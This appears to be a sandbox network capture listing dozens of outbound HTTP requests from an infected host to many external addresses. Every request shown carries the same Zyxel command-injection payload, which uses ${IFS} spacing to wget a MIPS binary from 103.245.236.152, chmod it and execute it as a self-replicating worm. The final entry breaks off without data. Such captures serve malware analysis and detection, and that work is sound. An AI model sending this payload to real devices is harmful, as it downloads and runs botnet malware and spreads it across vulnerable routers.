                                      Jan 14, 2024 15:50:57.549822092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7161192.168.2.145870495.15.87.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549843073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7162192.168.2.1433830142.208.9.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549884081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7163192.168.2.1444864194.122.142.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549933910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7164192.168.2.1444592169.66.244.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.549972057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7165192.168.2.1450348107.174.40.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550040007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7166192.168.2.1436184175.183.105.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550049067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7167192.168.2.145708680.77.202.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550098896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7168192.168.2.144461072.242.104.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550158024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7169192.168.2.1442314193.247.136.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550208092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7170192.168.2.145230258.103.179.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550228119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7171192.168.2.1444354120.88.163.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550277948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7172192.168.2.144929079.21.31.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550350904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7173192.168.2.1449380120.139.193.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550350904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7174192.168.2.143346672.38.217.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550400972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7175192.168.2.1442844158.160.163.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550407887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7176192.168.2.145295424.142.100.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550455093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7177192.168.2.1460604102.196.54.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550481081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7178192.168.2.144011220.95.240.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550506115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7179192.168.2.145755292.131.148.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550550938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7180192.168.2.1441916113.32.189.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550599098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7181192.168.2.1439882105.204.15.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550622940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7182192.168.2.146077492.46.132.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550689936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7183192.168.2.143813276.15.31.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550704956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7184192.168.2.143384435.162.105.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550757885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7185192.168.2.1453384161.67.174.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550771952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7186192.168.2.1449092206.100.161.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550823927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7187192.168.2.1451740198.30.34.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550869942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7188192.168.2.144941467.162.233.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550896883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7189192.168.2.143912294.233.147.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.550962925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7190192.168.2.14372669.78.84.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551008940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7191192.168.2.14523009.148.134.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551042080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192192.168.2.145927865.106.207.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551074028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7193192.168.2.1448760136.141.185.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551126957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7194192.168.2.146067661.151.25.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551162004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7195192.168.2.1442006101.153.43.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551211119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7196192.168.2.1451244220.230.138.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551268101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7197192.168.2.145722823.126.108.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551306963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7198192.168.2.1443868177.52.25.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551338911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7199192.168.2.1435048109.197.151.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551395893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7200192.168.2.144864281.170.45.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551440001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7201192.168.2.145422868.215.104.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551476955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7202192.168.2.1455862190.187.173.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551533937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7203192.168.2.1438424203.4.143.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551574945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7204192.168.2.1434800147.138.52.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551620960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7205192.168.2.1452066165.74.214.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551656961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7206192.168.2.1435930219.115.21.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551712036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7207192.168.2.144469437.109.238.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551745892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7208192.168.2.144148075.41.57.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551786900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7209192.168.2.1437240109.46.41.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551851034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7210192.168.2.144000261.44.65.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551887035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7211192.168.2.1447198112.35.55.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551928997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7212192.168.2.1459884123.52.5.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.551970959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7213192.168.2.143763668.192.82.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552002907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7214192.168.2.1453856219.112.113.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552046061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7215192.168.2.1456456195.20.205.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552078962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7216192.168.2.1458530101.170.189.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552134991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7217192.168.2.1434646150.120.54.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552164078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7218192.168.2.144935220.35.89.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552217960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7219192.168.2.145153698.18.79.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552237988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7220192.168.2.1434808104.253.116.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552309990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7221192.168.2.1446828154.114.145.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552350044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7222192.168.2.1459676186.57.4.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.552397966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7223192.168.2.1449276221.48.254.217443
                                      TimestampBytes transferredDirectionData
